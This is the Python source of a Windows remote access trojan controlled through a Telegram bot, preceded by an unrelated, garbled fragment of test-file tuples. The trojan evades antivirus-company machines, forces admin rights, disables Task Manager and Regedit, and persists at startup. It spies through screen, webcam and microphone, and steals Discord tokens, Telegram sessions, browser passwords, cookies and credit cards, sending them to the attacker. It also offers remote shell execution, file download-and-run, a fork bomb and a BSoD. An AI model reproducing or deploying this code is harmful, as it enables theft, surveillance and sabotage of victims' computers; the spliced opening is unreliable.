'user_jobs_one_off.UsernameLengthDistributionOneOffJob.create_new', ([], {}), '()\n', (8558, 8560), False, 'from core.domain import user_jobs_one_off\n'), ((8570, 8639), 'core.domain.user_jobs_one_off.UsernameLengthDistributionOneOffJob.enqueue', 'user_jobs_one_off.UsernameLengthDistributionOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (8631, 8639), False, 'from core.domain import user_jobs_one_off\n'), ((8882, 8954), 'core.domain.user_jobs_one_off.UsernameLengthDistributionOneOffJob.get_output', 'user_jobs_one_off.UsernameLengthDistributionOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (8946, 8954), False, 'from core.domain import user_jobs_one_off\n'), ((11621, 11680), 'core.domain.user_jobs_one_off.UsernameLengthAuditOneOffJob.create_new', 'user_jobs_one_off.UsernameLengthAuditOneOffJob.create_new', ([], {}), '()\n', (11678, 11680), False, 'from core.domain import user_jobs_one_off\n'), ((11690, 11752), 'core.domain.user_jobs_one_off.UsernameLengthAuditOneOffJob.enqueue', 'user_jobs_one_off.UsernameLengthAuditOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (11744, 11752), False, 'from core.domain import user_jobs_one_off\n'), ((11967, 12032), 'core.domain.user_jobs_one_off.UsernameLengthAuditOneOffJob.get_output', 'user_jobs_one_off.UsernameLengthAuditOneOffJob.get_output', (['job_id'], {}), '(job_id)\n', (12024, 12032), False, 'from core.domain import user_jobs_one_off\n'), ((13237, 13289), 'core.domain.user_jobs_one_off.LongUserBiosOneOffJob.create_new', 'user_jobs_one_off.LongUserBiosOneOffJob.create_new', ([], {}), '()\n', (13287, 13289), False, 'from core.domain import user_jobs_one_off\n'), ((13299, 13354), 'core.domain.user_jobs_one_off.LongUserBiosOneOffJob.enqueue', 'user_jobs_one_off.LongUserBiosOneOffJob.enqueue', (['job_id'], {}), '(job_id)\n', (13346, 13354), False, 'from core.domain import user_jobs_one_off\n'), ((13598, 13656), 'core.domain.user_jobs_one_off.LongUserBiosOneOffJob.get_output', 
import sys,platform
import telebot
import requests
from getmac import get_mac_address as gma
from RAT import *
from Core.Settings.Organization import *
from Core.Settings.Antivirus import *
from Core.Settings.Admin import *
from Core.Settings.CriticalProcess import *
from Core.Settings.MessageBox import *
from Core.Network.Information import *
from Core.Network.Location import *
from Core.Main.Screen import *
from Core.Main.Webcam import *
from Core.Main.Audio import *
from Core.Main.Power import *
from Core.Main.Autorun import *
from Core.Files.Tasklist import *
from Core.Files.Taskkill import *
from Core.Fun.Message import *
from Core.Fun.Speak import *
from Core.Fun.OpenURL import *
from Core.Fun.Wallpapers import *
from Core.Fun.ForkBomb import *
from Core.Stealer.Discord import *
from Core.Stealer.Stealer import *
from Core.Stealer.Telegram import *
from Core.Other.Clipboard import *
from Core.Other.Monitor import *
from Core.Other.Rotate import *
from Core.Other.Freeze import *
from telebot import types
from telebot import util
bot = telebot.TeleBot(TelegramToken, threaded=True)
bot.worker_pool = util.ThreadPool(num_threads=50)
menu = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/1\n<<')
button2 = types.KeyboardButton('/2\n>>')
button3 = types.KeyboardButton('/Screen\n🖼')
button4 = types.KeyboardButton('/Webcam\n📸')
button5 = types.KeyboardButton('/Audio\n🎙')
button6 = types.KeyboardButton('/Power\n🔴')
button7 = types.KeyboardButton('/Autorun\n🔵')
menu.row(button1, button3, button2)
menu.row(button4, button5)
menu.row(button6, button7)
main2 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Hibernate - 🛑', callback_data='hibernate')
button2 = types.InlineKeyboardButton('Shutdown - ⛔️', callback_data='shutdown')
button3 = types.InlineKeyboardButton('Restart - ⭕️', callback_data='restart')
button4 = types.InlineKeyboardButton('Logoff - 💢', callback_data='logoff')
button5 = types.InlineKeyboardButton('BSoD - 🌀', callback_data='bsod')
button6 = types.InlineKeyboardButton('« Back', callback_data='cancel')
main2.row(button1)
main2.row(button2)
main2.row(button3)
main2.row(button4)
main2.row(button5)
main2.row(button6)
main3 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Add to Startup - 📥', callback_data='startup')
button2 = types.InlineKeyboardButton('Uninstall - ♻️', callback_data='confirm')
button3 = types.InlineKeyboardButton('« Back', callback_data='cancel')
main3.row(button1)
main3.row(button2)
main3.row(button3)
main4 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Yes, im sure!', callback_data='uninstall')
button2 = types.InlineKeyboardButton('Hell no!', callback_data='cancel')
button3 = types.InlineKeyboardButton('« Back', callback_data='cancel')
main4.row(button1)
main4.row(button2)
main4.row(button3)
main5 = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/3\n<<')
button2 = types.KeyboardButton('/4\n>>')
button3 = types.KeyboardButton('/Screen\n🖼')
button4 = types.KeyboardButton('/Files\n💾')
button5 = types.KeyboardButton('/Tasklist\n📋')
button6 = types.KeyboardButton('/Taskkill\n📝')
main5.row(button1, button3, button2)
main5.row(button4)
main5.row(button5, button6)
main6 = types.InlineKeyboardMarkup()
button1 = types.InlineKeyboardButton('Kill all Processes', callback_data='taskkill all')
button2 = types.InlineKeyboardButton('Disable Task Manager', callback_data='disabletaskmgr')
main6.row(button1)
main6.row(button2)
main7 = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/CD\n🗂')
button2 = types.KeyboardButton('/Upload\n📡')
button3 = types.KeyboardButton('/ls\n📄')
button4 = types.KeyboardButton('/Remove\n🗑')
button5 = types.KeyboardButton('/Download\n📨')
button6 = types.KeyboardButton('/Run\n📌')
button7 = types.KeyboardButton('/Cancel')
main7.row(button1, button2, button3)
main7.row(button4, button5, button6)
main7.row(button7)
main8 = types.ReplyKeyboardMarkup()
button1 = types.KeyboardButton('/5\n<<')
button2 = types.KeyboardButton('/6\n>>')
button3 = types.KeyboardButton('/Screen\n🖼')
button4 = types.KeyboardButton('/Message\n💬')
button5 = types.KeyboardButton('/Speak\n📢')
button6 = types.KeyboardButton('/OpenURL\n🌐')
button7 = types.KeyboardButton('/Wallpapers\n🧩')
button8 = types.KeyboardButton('/ForkBomb\n⏱')
main8.row(button1, button3, button2)
main8.row(button4, button5)
main8.row(button6, button7, button8)
# Variables
Expansion = os.path.splitext(os.path.basename(sys.argv[0]))[1]
CurrentName = os.path.basename(sys.argv[0])
CurrentPath = sys.argv[0]
ProcessName = ProcessName + Expansion
# Create a folder to save temporary files
if not os.path.exists(Directory):
os.makedirs(Directory)
os.makedirs(Directory + 'Documents')
os.makedirs(Directory + 'Photos')
# Checks if the script is running computer of the anti-virus organization
if Organization() is True:
sys.exit()
# Run as Administrator
if AdminRightsRequired is True:
if Admin() is False:
while True:
try:
print('[~] › Trying elevate previleges to administrator\n')
os.startfile(CurrentPath, 'runas')
except:
pass
else:
print('[+] › ' + CurrentName + ' opened as admin rights\n')
break
# Checks if the file is running as an administrator
if AdminRightsRequired is True:
if Admin() is False:
sys.exit()
# Disables TaskManager
if DisableTaskManager is True:
try:
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
print('[+] › Task Manager is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
print('[+] › Task Manager is was disabled\n')
except:
pass
# Disables Regedit
if DisableRegistryTools is True:
try:
if os.path.exists(Directory + 'RegeditDisableRegistryTools'):
print('[+] › Regedit is already disabled\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
RegeditDisableRegistryTools()
open(Directory + 'RegeditDisableRegistryTools', 'a').close()
print('[+] › Regedit is was disabled\n')
except:
pass
# Adds a program to startup
if AutorunEnabled is True:
try:
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
print('[+] › '+ CurrentName +' ‹ is already in startup › ' + InstallPath + '\\' + ProcessName + '\n')
else:
if Admin() is False:
print('[-] › This function requires admin rights!\n')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
if not os.path.exists(InstallPath + '\\' + ProcessName):
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
print('[+] › ' + CurrentName+' ‹ copied to startup › ' + InstallPath + '\\' + ProcessName + '\n')
except:
pass
# Displays a message on the screen.
if DisplayMessageBox is True:
try:
if os.path.exists(Directory + 'DisplayMessageBox'):
pass
else:
open(Directory + 'DisplayMessageBox', 'a').close()
MessageBox(Message)
except:
pass
# Protect process with BSoD (if killed).
if ProcessBSODProtectionEnabled is True:
if Admin() is False:
print('[-] › This function requires admin rights\n')
if Admin() is True:
SetProtection()
print('[+] › Process protection is was activated\n')
# Adds argument none_stop if process protection is enabled
if ProcessBSODProtectionEnabled is True:
Argument = none_stop = True
else:
Argument = ''
# Sends an online message
while True:
try:
if Admin() is True:
Online = '🔘 Online!'
if Admin() is False:
Online = '🟢 Online!'
bot.send_message(TelegramChatID,
'\n*' + Online + '\n'
'\nPC » ' + ComputerName + '_' + gma() + '_' + os.getlogin() +
'\nOS » ' + Windows() +
'\n'
'\nAV » ' + Antivirus[0] +
'\n'
'\nIP » ' + Geolocation('query') + '*',
parse_mode='Markdown')
except Exception as e:
print('[-] › Retrying connect to api.telegram.org\n')
print(e)
else:
print('[+] › Connected to api.telegram.org\n')
break
# Takes a screenshot
@bot.message_handler(regexp='/Screen')
def Screen(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Screenshot.jpg'
Screenshot(File)
Screen = open(File, 'rb')
bot.send_photo(command.chat.id, Screen)
except:
pass
# Takes a photo from a webcam
@bot.message_handler(regexp='/Webcam')
def Webcam(command):
try:
bot.send_chat_action(command.chat.id, 'upload_photo')
File = Directory + 'Webcam.jpg'
if os.path.exists(File):
os.remove(File)
WebcamScreenshot(File)
Webcam = open(File, 'rb')
bot.send_photo(command.chat.id, Webcam)
except:
bot.reply_to(command, '_Webcam not found!_', parse_mode='Markdown')
# Records microphone sound
@bot.message_handler(regexp='/Audio')
def Audio(command):
try:
Seconds = re.split('/Audio ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Recording..._', parse_mode='Markdown')
try:
File = Directory + 'Audio.wav'
Microphone(File, Seconds)
Audio = open(File, 'rb')
bot.send_voice(command.chat.id, Audio)
except ValueError:
bot.reply_to(command, '_Specify the recording time in seconds!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Microphone not found!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the recording duration_\n\n*› /Audio*', parse_mode='Markdown')
# Sends a message
def SendMessage(call, text):
bot.edit_message_text(chat_id=call.message.chat.id,
message_id=call.message.message_id, text=text, parse_mode='Markdown')
# Power and startup management
@bot.callback_query_handler(func=lambda call: True)
def callback_inline(command):
if command.message:
# Hibernate button
if command.data == 'hibernate':
try:
SendMessage(command, '*Hibernate* _command received!_')
UnsetProtection()
Hibernate()
except:
pass
# Shutdown button
if command.data == 'shutdown':
try:
SendMessage(command, '*Shutdown* _command received!_')
UnsetProtection()
Shutdown()
except:
pass
# Reboot button
if command.data == 'restart':
try:
SendMessage(command, '*Restart* _command received!_')
UnsetProtection()
Restart()
except:
pass
# Button that ends a user session
if command.data == 'logoff':
try:
SendMessage(command, '*Logoff* _command received!_')
UnsetProtection()
Logoff()
except:
pass
# Button killing system with blue screen of death
if command.data == 'bsod':
try:
SendMessage(command, '*Blue Screen of Death* _is was activated!_')
UnsetProtection()
BSoD()
except:
pass
# Button processing which adds a trojan to startup (schtasks)
if command.data == 'startup':
try:
if SchtasksExists(AutorunName) and InstallPathExists(InstallPath, ProcessName) is True:
SendMessage(command, '*' + ProcessName + '* _is already in startup!_')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights!_')
if Admin() is True:
AddToAutorun(AutorunName, InstallPath, ProcessName)
if not os.path.exists(InstallPath + '\\' + ProcessName):
CopyToAutorun(CurrentPath, InstallPath, ProcessName)
SendMessage(command, '*' + ProcessName + '* _copied to startup!_')
except FileNotFoundError:
SendMessage(command, '_No such file or directory_')
except:
pass
# Button processing that confirms the removal of a trojan
if command.data == 'confirm':
bot.edit_message_text(chat_id=command.message.chat.id,
message_id=command.message.message_id, text='_Are you sure?_', reply_markup=main4, parse_mode='Markdown')
# Handling the <<Uninstall>> Button
if command.data == 'uninstall':
SendMessage(command, '*' + CurrentName + '* _is was uninstalled!_')
Uninstall(AutorunName, InstallPath, ProcessName, CurrentName, CurrentPath, Directory)
# Handling the <<Kill All Processes>> Button
if command.data == 'taskkill all':
try:
TaskkillAll(CurrentName)
SendMessage(command, '_All processes is was stopped!_')
except:
pass
# Handling the <<Disable Task Manager>> Button
if command.data == 'disabletaskmgr':
try:
if os.path.exists(Directory + 'RegeditDisableTaskManager'):
SendMessage(command, '*Task Manager* _is already disabled!_')
else:
if Admin() is False:
SendMessage(command, '_This function requires admin rights!_')
if Admin() is True:
RegeditDisableTaskManager()
open(Directory + 'RegeditDisableTaskManager', 'a').close()
SendMessage(command, '*Task Manager* _is was disabled!_')
except:
pass
# Handling the <<Back>> Button
if command.data == 'cancel':
SendMessage(command, '`...`')
# Browse and switch directories
@bot.message_handler(regexp='/CD')
def CD(command):
try:
Path = re.split('/CD ', command.text, flags=re.I)[1]
os.chdir(Path)
bot.send_message(command.chat.id, '_Directory Changed!_\n\n`' + os.getcwd() + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_Directory not found!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Current Directory_\n\n`' + os.getcwd() + '`\n\n_Username_\n\n`' + os.getlogin() + '`', parse_mode='Markdown')
# List of files from a directory
@bot.message_handler(regexp='/ls')
def ls(command):
try:
Dirs = '\n``'.join(os.listdir())
bot.send_message(command.chat.id, '`' + os.getcwd() + '`\n\n' + '`' + Dirs + '`', parse_mode='Markdown')
except:
try:
Dirse = '\n'.join(os.listdir())
SplittedText = util.split_string(Dirse, 4096)
for Dirse in SplittedText:
bot.send_message(command.chat.id, '`' + Dirse + '`', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
pass
# Deletes a user selected file
@bot.message_handler(commands=['Remove', 'remove'])
def Remove(command):
try:
File = re.split('/Remove ', command.text, flags=re.I)[1]
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=localtime(Created)[:-3]
def ConvertBytes(num):
for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:
if num < 1024.0:
return '%3.1f %s' % (num, x)
num /= 1024.0
def FileSize(FilePath):
if os.path.isfile(FilePath):
FileInfo = os.stat(FilePath)
return ConvertBytes(FileInfo.st_size)
bot.send_message(command.chat.id,
'_File_ *' + File + '* _removed!_'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `' + FileSize(os.getcwd() + '\\' + File) + '`',
parse_mode='Markdown')
os.remove(os.getcwd() + '\\' + File)
except:
try:
Created = os.path.getctime(os.getcwd() + '\\' + File)
Year, Month, Day, Hour, Minute, Second=localtime(Created)[:-3]
Folder = os.getcwd() + '\\' + File
FolderSize = 0
for (Path, Dirs, Files) in os.walk(Folder):
for iFile in Files:
FileName = os.path.join(Path, iFile)
FolderSize += os.path.getsize(FileName)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd() + '\\' + File):
Files += len(FileNames)
Folders += len(DirNames)
shutil.rmtree(os.getcwd() + '\\' + File)
bot.send_message(command.chat.id,
'_Folder_ *' + File + '* _removed!_'
'\n'
'\n*Created* » `%02d/%02d/%d'%(Day, Month, Year) + '`' +
'\n*Size* » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\n*Contained* » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Remove • /RemoveAll*', parse_mode='Markdown')
# Deletes all files from the directory
@bot.message_handler(commands=['RemoveAll', 'removeall'])
def RemoveAll(command):
try:
bot.send_message(command.chat.id, '_Removing files..._', parse_mode='Markdown')
FolderSize = 0
for (Path, Dirs, Files) in os.walk(os.getcwd()):
for File in Files:
FileNames = os.path.join(Path, File)
FolderSize += os.path.getsize(FileNames)
Files = Folders = 0
for _, DirNames, FileNames in os.walk(os.getcwd()):
Files += len(FileNames)
Folders += len(DirNames)
list = os.listdir(os.getcwd())
a = len(list)
for FileNames in os.listdir(os.getcwd()):
FilePath = os.path.join(os.getcwd(), FileNames)
try:
if os.path.isfile(FilePath) or os.path.islink(FilePath):
os.unlink(FilePath)
elif os.path.isdir(FilePath):
shutil.rmtree(FilePath)
except:
pass
list = os.listdir(os.getcwd())
b = len(list)
c = (a - b)
bot.send_message(command.chat.id,
'_Removed_ *' + str(c) + '* _files out of_ *' + str(a) + '!*'
'\n'
'\nSize » `%0.1f MB' % (FolderSize/(1024*1024.0)) + '`' +
'\nContained » `' + '{:,} Files, {:,} Folders'.format(Files, Folders) + '`',
parse_mode='Markdown')
except:
pass
# Upload a file to a connected computer (URL)
@bot.message_handler(regexp='/Upload')
def Upload(command):
try:
URL = re.split('/Upload ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
r = requests.get(URL, allow_redirects=True)
File = os.getcwd() + '\\' + os.path.basename(r.URL)
open(File, 'wb').write(r.content)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + File + '`', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Insert a direct download link_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Send file or paste URL_\n\n*› /Upload*', parse_mode='Markdown')
# Download a file to a connected computer (Message)
@bot.message_handler(content_types=['document'])
def Document(command):
try:
File = bot.get_file(command.document.file_id)
bot.send_message(command.chat.id, '_Uploading file..._', parse_mode='Markdown')
DownloadedFile = bot.download_file(File.file_path)
Source = Directory + File.file_path;
with open(Source, 'wb') as NewFile:
NewFile.write(DownloadedFile)
Final = os.getcwd() + '\\' + Source.split(File.file_path)[1] + command.document.file_name
shutil.move(Source, Final)
bot.reply_to(command, '_File uploaded to computer!_\n\n`' + Final + '`', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File format is not supported!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Try saving the file in a different directory_', parse_mode='Markdown')
except:
bot.reply_to(command, '_You cannot upload a file larger than 20 MB_', parse_mode='Markdown')
# Download the file selected by the user
@bot.message_handler(regexp='/Download')
def Download(command):
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
Download = open(os.getcwd() + '\\' + File, 'rb')
bot.send_message(command.chat.id, '_Sending file..._', parse_mode='Markdown')
bot.send_document(command.chat.id, Download)
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except:
try:
File = re.split('/Download ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Archiving..._', parse_mode='Markdown')
shutil.make_archive(Directory + File,
'zip',
os.getcwd() + '\\',
File)
iFile = open(Directory + File + '.zip', 'rb')
bot.send_message(command.chat.id, '_Sending folder..._', parse_mode='Markdown')
bot.send_document(command.chat.id, iFile)
iFile.close()
os.remove(Directory + File + '.zip')
except PermissionError:
bot.reply_to(command, '_Permission denied!_', parse_mode='Markdown')
except:
try:
iFile.close()
os.remove(Directory + File + '.zip')
bot.reply_to(command, '_You cannot download a file larger than 50 MB_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Download*', parse_mode='Markdown')
# Runs the file selected by the user
@bot.message_handler(commands=['Run', 'run'])
def Run(command):
try:
File = re.split('/Run ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File)
bot.reply_to(command, '_File_ *' + File + '* _is running!_', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_The file is isolated by the system and cannot be running_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Runs the file selected by the user as administrator
@bot.message_handler(commands=['RunAS', 'runas'])
def RunAS(command):
try:
File = re.split('/RunAS ', command.text, flags=re.I)[1]
os.startfile(os.getcwd() + '\\' + File, 'runas')
bot.reply_to(command, 'File *' + File + '* is running!', parse_mode='Markdown')
except FileNotFoundError:
bot.reply_to(command, '_File not found!_', parse_mode='Markdown')
except OSError:
bot.reply_to(command, '_Acces denied!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter a file name_\n\n*› /Run • /RunAS*', parse_mode='Markdown')
# Gets a list of active processes
@bot.message_handler(regexp='/Tasklist')
def Tasklist(command):
try:
bot.send_message(command.chat.id, '`' + ProcessList() + '`', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Failed to get process list!_', parse_mode='Markdown')
# Kills the user selected process
@bot.message_handler(regexp='/Taskkill')
def Taskkill(command):
try:
Process = re.split('/Taskkill ', command.text, flags=re.I)[1]
KillProcess(Process)
if not Process.endswith('.exe'):
Process = Process + '.exe'
bot.reply_to(command, '_Process_ *' + Process + '* _is was stopped!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter process name_'
'\n'
'\n*› /Taskkill*'
'\n'
'\n_Active Window_'
'\n'
'\n`' + str(WindowTitle()) + '`',
reply_markup=main6, parse_mode='Markdown')
# Displays text sent by user
@bot.message_handler(regexp='/Message')
def Message(command):
try:
Message = re.split('/Message ', command.text, flags=re.I)[1]
bot.reply_to(command, '_The message is was sended!_', parse_mode='Markdown')
SendMessageBox(Message)
except:
bot.send_message(command.chat.id, '_Enter your message_\n\n*› /Message*', parse_mode='Markdown')
# Speak text
@bot.message_handler(regexp='/Speak')
def Speak(command):
try:
Text = re.split('/Speak ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Speaking..._', parse_mode='Markdown')
try:
SpeakText(Text)
bot.reply_to(command, '_Successfully!_', parse_mode='Markdown')
except:
bot.reply_to(command, '_Failed to speak text!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your text_\n\n*› /Speak*', parse_mode='Markdown')
# Opens a link from a standard browser
@bot.message_handler(regexp='/OpenURL')
def OpenURL(command):
try:
URL = re.split('/OpenURL ', command.text, flags=re.I)[1]
OpenBrowser(URL)
bot.reply_to(command, '_The URL is was opened!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your URL_\n\n*› /OpenURL*', parse_mode='Markdown')
# Sets the desktop wallpaper
@bot.message_handler(content_types=['photo'])
def Wallpapers(command):
try:
Photo = bot.get_file(command.photo[len(command.photo)-1].file_id)
file_info = bot.get_file(command.photo[len(command.photo)-1].file_id)
downloaded_file = bot.download_file(file_info.file_path)
src = Directory + file_info.file_path;
with open(src, 'wb') as new_file:
new_file.write(downloaded_file)
SetWallpapers(Photo, Directory)
bot.reply_to(command, '_The photo is set on the wallpapers!_', parse_mode='Markdown')
except:
pass
# Infinite start CMD.exe
@bot.message_handler(regexp='/Forkbomb')
def Forkbomb(command):
bot.send_message(command.chat.id, '_Preparing ForkBomb..._', parse_mode='Markdown')
ForkBomb()
# Gets Discord Token
@bot.message_handler(regexp='/Discord')
def Discord(command):
try:
bot.send_message(command.chat.id, '*Discord Token*\n\n`' + DiscordToken() + '`', parse_mode='Markdown')
except:
bot.reply_to(command, '_Discord not installed!_', parse_mode='Markdown')
# Gets the user current telegram session
@bot.message_handler(regexp='/Telegram')
def Telegram(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
TelegramGrab(Directory)
Telegram = open(Directory + 'tdata.zip', 'rb')
bot.send_document(command.chat.id, Telegram)
except:
bot.reply_to(command, '_Telegram not installed!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/CreditCards')
def CreditCards(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'CreditCards.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCreditCards())
CreditCards = open(Directory + 'CreditCards.txt', 'rb')
bot.send_document(command.chat.id, CreditCards)
except:
bot.reply_to(command, '_CreditCards not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Bookmarks')
def Bookmarks(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Bookmarks.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedBookmarks())
Bookmarks = open(Directory + 'Bookmarks.txt', 'rb')
bot.send_document(command.chat.id, Bookmarks)
except:
bot.reply_to(command, '_Bookmarks not found!_', parse_mode='Markdown')
# Retrieves saved passwords from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Passwords')
def Passwords(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Passwords.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedPasswords())
Passwords = open(Directory + 'Passwords.txt', 'rb')
bot.send_document(command.chat.id, Passwords)
except:
bot.reply_to(command, '_Passwords not found!_', parse_mode='Markdown')
# Retrieves saved cookies from browsers (Opera, Chrome)
@bot.message_handler(regexp='/Cookies')
def Cookies(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'Cookies.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedCookies())
Cookies = open(Directory + 'Cookies.txt', 'rb')
bot.send_document(command.chat.id, Cookies)
except:
bot.reply_to(command, '_Cookies not found!_', parse_mode='Markdown')
# Gets saved browser history (Opera, Chrome)
@bot.message_handler(regexp='/History')
def History(command):
try:
bot.send_chat_action(command.chat.id, 'upload_document')
with open(Directory + 'History.txt', 'w', encoding='utf-8') as f:
f.writelines(GetFormattedHistory())
History = open(Directory + 'History.txt', 'rb')
bot.send_document(command.chat.id, History)
except:
bot.reply_to(command, '_History not found!_', parse_mode='Markdown')
# Editing and viewing the clipboard
@bot.message_handler(regexp='/Clipboard')
def Clipboard(command):
try:
Text = re.split('/Clipboard ', command.text, flags=re.I)[1]
SetClipboard(Text)
bot.reply_to(command, '_Clipboard contents changed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Enter your text_'
'\n'
'\n*› /Clipboard*'
'\n'
'\n_Clipboard Content_'
'\n'
'\n`' + GetClipboard() + '`',
parse_mode='Markdown')
# Display Rotate <0,90,180,270>
@bot.message_handler(regexp='/Rotate')
def Rotate(command):
try:
Position = re.split('/Rotate ', command.text, flags=re.I)[1]
DisplayRotate(Degrees=Position)
bot.reply_to(command, '_Display is was rotated!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select display rotation_'
'\n'
'\n*› /Rotate*'
'\n'
'\n_Provisions_'
'\n'
'\n`0` / `90` / `180` / `270`',
parse_mode='Markdown')
# Monitor <on/off>
@bot.message_handler(regexp='/Monitor')
def Monitor(command):
try:
Monitor = re.split('/Monitor ', command.text, flags=re.I)[1]
if Monitor.lower() == 'Off'.lower():
Off()
bot.reply_to(command, '_Monitor is was Off_', parse_mode='Markdown')
if Monitor.lower() == 'On'.lower():
On()
bot.reply_to(command, '_Monitor is was On_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id,
'_Select monitor mode_'
'\n'
'\n*› /Monitor*'
'\n'
'\n_Modes_'
'\n'
'\n`On` / `Off`',
parse_mode='Markdown')
# Lock input (keyboard and mouse) for the selected number of seconds
@bot.message_handler(regexp='/Freeze')
def Freeze(command):
if Admin() is False:
bot.send_message(command.chat.id, '_This function requires admin rights!_', parse_mode='Markdown')
if Admin() is True:
try:
Seconds = re.split('/Freeze ', command.text, flags=re.I)[1]
bot.send_message(command.chat.id, '_Keyboard and mouse locked for_ *' + Seconds + '* _seconds!_', parse_mode='Markdown')
Block(float(Seconds))
bot.reply_to(command, '_Keyboard and mouse are now unlocked!_', parse_mode='Markdown')
except ValueError:
bot.reply_to(command, '_Specify the duration of the lock in seconds_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Specify the duration of the lock_\n\n*› /Freeze*', parse_mode='Markdown')
# Remote command execution (CMD)
@bot.message_handler(regexp='/CMD')
def CMD(command):
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
CMD = Popen(Command, shell=True, stdout=PIPE, stderr=STDOUT, stdin=PIPE)
Lines = []
for Line in CMD.stdout.readlines():
Line = Line.strip()
if Line:
Lines.append(Line.decode('cp866'))
Output = '\n'.join(Lines)
bot.send_message(command.chat.id, Output)
except:
try:
Command = re.split('/CMD ', command.text, flags=re.I)[1]
SplittedText = util.split_string(Output, 4096)
for Output in SplittedText:
bot.send_message(command.chat.id, Output)
except UnboundLocalError:
bot.reply_to(command, '_Command completed!_', parse_mode='Markdown')
except:
bot.send_message(command.chat.id, '_Enter your command_\n\n*› /CMD*', parse_mode='Markdown')
# Getting location by BSSID
@bot.message_handler(regexp='/Location')
def Location(command):
try:
bot.send_chat_action(command.chat.id, 'find_location')
Coordinates = GetLocationByBSSID(GetMacByIP())
Latitude = Coordinates['lat']
Longitude = Coordinates['lon']
bot.send_location(command.chat.id, Latitude, Longitude)
bot.send_message(command.chat.id,
'_Location_'
'\n'
'\n*IP Address* » `' + Geolocation('query') + '`' +
'\n*Country* » `' + Geolocation('country') + '`' +
'\n*City* » `' + Geolocation('city') + '`' +
'\n'
'\n*Latitude* » `' + str(Coordinates['lat']) + '`' +
'\n*Longitude* » `' + str(Coordinates['lon']) + '`' +
'\n*Range* » `' + str(Coordinates['range']) + '`' +
'\n'
'\n*BSSID* » `' + GetMacByIP() + '`' +
